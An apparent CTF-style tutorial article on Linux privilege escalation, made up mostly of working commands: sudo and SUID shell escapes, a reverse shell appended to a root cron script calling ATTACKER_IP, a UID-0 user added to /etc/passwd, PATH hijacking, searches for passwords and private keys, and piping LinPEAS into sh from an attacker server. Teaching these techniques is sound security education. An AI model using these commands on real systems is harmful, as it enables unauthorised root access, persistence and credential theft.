KB / Статті / Linux Privilege Escalation: базові техніки
UA EN

Linux Privilege Escalation: Basic Techniques

✍ admin 📅 12.06.2026 👁 115 переглядів

What is Privilege Escalation?

After gaining initial access to a system (usually as a regular user), the goal is to become root. This process is called privilege escalation (privesc).

Initial Reconnaissance

# Who are we?
id
whoami

# What OS and kernel version?
uname -a
cat /etc/os-release

# What can we run with sudo?
sudo -l

# Other users
cat /etc/passwd | grep -v nologin

# Where are we?
pwd
ls -la

1. Sudo Without a Password

sudo -l

If we see something like:

(ALL) NOPASSWD: /usr/bin/vim

Launch vim and get a shell from it:

sudo vim -c ':!/bin/bash'

GTFOBins — site with techniques for hundreds of binaries:

https://gtfobins.github.io/

Just find the binary in the list and copy the command.

2. SUID Bits

SUID (Set User ID) — the file runs with the owner's privileges, not those of the person executing it.

# Find all SUID files
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null

Classic example — /bin/bash with SUID:

# If bash has SUID root
/bin/bash -p

find with SUID:

find . -exec /bin/bash -p \; -quit

nmap (older versions):

nmap --interactive
nmap> !sh

Check all discovered SUID files on GTFOBins.

3. Cron Jobs

Cron jobs running as root are a goldmine for privesc.

# System crontab
cat /etc/crontab

# Cron directories
ls -la /etc/cron*

# Cron logs (may show what's running)
cat /var/log/cron.log 2>/dev/null
grep "CRON" /var/log/syslog 2>/dev/null

Attack scenario: A script runs as root every minute, but the script file is writable by us.

# Check file permissions
ls -la /opt/cleanup.sh

# If writable — add a reverse shell
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/cleanup.sh

# Wait on your listener
nc -lvnp 4444

4. Writable /etc/passwd

ls -la /etc/passwd

If the file is writable — we can add a new root user:

# Generate a password hash for "hacked"
openssl passwd -1 -salt salt hacked
# $1$salt$...

# Add an entry with UID=0
echo 'hacker:$1$salt$HASH:0:0:root:/root:/bin/bash' >> /etc/passwd

# Log in
su hacker

5. PATH Hijacking

If a SUID program calls other commands without the full path:

# Find what the program calls
strings /usr/local/bin/suid_program

# If it calls "service" without /usr/sbin/service
# Create our own "service" in /tmp
echo '#!/bin/bash' > /tmp/service
echo 'bash -p' >> /tmp/service
chmod +x /tmp/service

# Modify PATH
export PATH=/tmp:$PATH

# Run the vulnerable program
/usr/local/bin/suid_program

6. Weak Passwords and Reuse

# Search for passwords in files
grep -r "password" /var/www/ 2>/dev/null
grep -r "passwd" /etc/ 2>/dev/null
find / -name "*.conf" -exec grep -l "password" {} \; 2>/dev/null

# Files with private keys
find / -name "id_rsa" 2>/dev/null
find / -name "*.pem" 2>/dev/null

Automation: LinPEAS

# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or serve via HTTP server
# On the attacking machine:
python3 -m http.server 8080

# On the target:
curl http://ATTACKER:8080/linpeas.sh | sh

LinPEAS highlights critical findings in red/yellow — focus on those.

CTF Checklist

  • [ ] sudo -l — what can we run?
  • [ ] find / -perm -4000 2>/dev/null — SUID files
  • [ ] cat /etc/crontab + /etc/cron* — cron jobs
  • [ ] Passwords in config files and history
  • [ ] Writable files executed as root
  • [ ] Kernel version → search for public exploits
  • [ ] LinPEAS for automated analysis
Коментарі (0)
Увійди, щоб залишити коментар.
Коментарів поки немає.
Вперше тут?
Новачок на Bastion?
Почни з гайду користувача.
Відкрити гайд →
?